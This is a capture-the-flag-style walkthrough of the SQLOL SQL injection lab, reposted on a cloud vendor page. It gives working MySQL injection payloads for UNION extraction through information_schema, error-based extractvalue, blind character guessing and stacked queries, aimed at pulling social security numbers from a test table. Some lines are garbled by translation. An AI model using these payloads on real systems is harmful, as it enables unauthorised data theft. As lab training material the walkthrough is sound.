SQL injection Test Platform Sqlol-6.challenges Challenge

Source: Internet
Author: User
Tags hex code

Sqlol the above challenges a total of 14, next we have a close to break through.

Challenge 0

The goal is to have the query return all user names, not just one.

Select username from users WHERE username = "'1 '" GROUP by username ORDER by username ASC

Injection point at "1"

Construct Poc:1 ' or 1=1# or 1 ' and 1=2 Union select username from users#

All user names can be queried.

Challenge 1

The goal is to find the Social Security number table that exists in the database and extract the information.

Select username from users WHERE username = "' 1 '" GROUP by username ORDER by username ASC

The injection point at "1", we need to know which tables which fields, in order to find the information we want to, for this, we use INFORMATION_SCHEMA to check the list.

To construct a POC:

Isolate all libraries of the database, ' and 1=2 UNION SELECT Table_schema from information_schema.tables#

Select Sqlol Library table, ' and 1=2 UNION select table_name from information_schema.tables WHERE table_schema= ' sqlol ' #

Select table, check column, ' and 1=2 UNION select column_name from information_schema.columns WHERE table_name= ' ssn ' #

Select field, check data, ' UNION select concat (name, 0x7e, ssn) from ssn#

This is where you get the information you want.

Challenge 2

The goal is to find the Social Security number table that exists in the database and extract the information.

Select username from users WHERE isadmin = ' 1 ' GROUP by username ORDER by username ASC

The injection point at "1", similar to Challenge1, is different, this is a digital injection, filtered single quotes.

To construct a POC:

Find all libraries in the database, 1 and 1=2 UNION SELECT Table_schema from information_schema.tables#

Select Sqlol Library table, 1 and 1=2 UNION Select table_name from Information_schema.tables WHERE table_schema=0x73716c6f6c# (0x73716c 6F6C is the hex code of SQLOL)

Select table, check column, 1 and 1=2 UNION select column_name from Information_schema.columns WHERE table_name=0x73736e# (0x73736e is SSN Hex code)

Select field, check data, 1 and 1=2 UNION select concat (name, 0x7e, ssn) from ssn#

This is where you get the information you want.

Challenge 3

The goal is to find the Social Security number table that exists in the database and extract the information.

No prompt, only one line, detailed error message, query does not display, similar to challenge 1.

To construct a POC:

' UNION SELECT concat (name, ': ', ssn ') from SSN LIMIT 0,1

Challenge 4

The aim is to find out the Social Security Number table in the database and extract its information without blind SQL injection technology.

Hint, there are detailed errors that can be injected with an error

To construct a POC:

' and Extractvalue (1, concat (0x5c, (select User ())) #

' And Extractvalue (1,concat (0x01, (select concat (Name, ': ', ssn) from SSN limit 0,1)) #

Challenge 5

The goal is to find the Social Security number table that exists in the database and extract the information.

Hint, use blind, no input error message

To construct a POC:

Get the length of the database: 1 ' or Length (database ()) =5#

Verbatim guessing ASCII: 1 ' or ASCII (Mid (Database (), 1, 1)) =115#

Slowly guess, always guess, the approximate method of this.

Challenge 6

The goal is to create a new table called "Ipwntyourdb" that uses a stacked query.

To construct a POC:

SELECT username from users WHERE username = ' Herp derper '; CREATE table Ipwntyourdb (ID VARCHAR (+) not NULL) # GROUP by us Ername ORDER by username ASC

SQL injection test platform Sqlol-6.challenges challenges

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.